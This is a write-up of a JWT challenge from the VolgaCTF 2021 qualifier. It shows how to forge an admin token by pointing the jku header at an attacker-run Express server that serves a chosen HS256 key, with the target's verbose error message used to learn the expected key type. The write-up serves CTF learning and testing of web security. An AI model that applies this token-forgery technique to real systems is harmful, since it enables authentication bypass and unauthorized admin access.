VolgaCTF 2021 Qualifier - JWT

[aszx87410]

JWT

Description

Writeup

After register and login we will have a JWT, and we need to be admin to get the flag.

This is how JWT looks like:

At first, I found that I can replace jku to my own server, so I implemented a simple server to return the key. Unfortunately, it keeps return error which said that it can not find a suitable key. I stuck here for a long time and have no idea how to proceed.

Then, I noticed a very important part in the error message, part of jwk are included in the response. So I tried to change the JWT kid to another random string, here is the error message from server:

JWT processing failed. Additional details: [[17] Unable to process JOSE object (cause: org.jose4j.lang.UnresolvableKeyException: Unable to find a suitable verification key for JWS w/ header {"kid":"HS2561","alg":"HS256"} from JWKs [org.jose4j.jwk.OctetSequenceJsonWebKey{kty=oct, kid=HS256, alg=HS256}] obtained from http://localhost:8080/secret): JsonWebSignature{"kid":"HS2561","alg":"HS256"}->eyJraWQiOiJIUzI1NjEiLCJhbGciOiJIUzI1NiJ9.eyJqa3UiOiJodHRwOi8vbG9jYWxob3N0OjgwODAvc2VjcmV0IiwiZXhwIjoxNjE3NTMwOTkyLCJqdGkiOiJCREFjSTZ1V0p5X0tvdmhTWnN6WW5nIiwiaWF0IjoxNjE2OTI2MTkyLCJuYmYiOjE2MTY5MjYwNzIsInN1YiI6ImV3ZWlvZmpld29pZiJ9.G_4j1QH9RoiSkv59rmZz0gtNFKPath-Bi8J4_dQmevo]

Great! Now we know the kty is oct, no wonder kty=RSA keeps throw error.

Now we know the correct kty so we can create our own jwk server:

const express    = require('express')
const app = express()

app.get('/', (req, res) => {
  res.json({
    "kty": "oct",
    "kid": "HS256",
    "alg": "HS256",
    "k": "AyM1SysPpbyDfgZld3umj1qzKObwVMkoqQ-EstJQLr_T-1qS0gZH75aKtMN3Yj0iPS4hcgUuTwjAzZr1Z9CAow"
  })
})

app.listen(3000)

We can sign a new JWT with sub=admin by using this secret key, and get the flag.

reference:

1. https://blog.pentesteracademy.com/hacking-jwt-tokens-jku-claim-misuse-2e732109ac1c
2. https://tools.ietf.org/html/rfc7517#appendix-A.3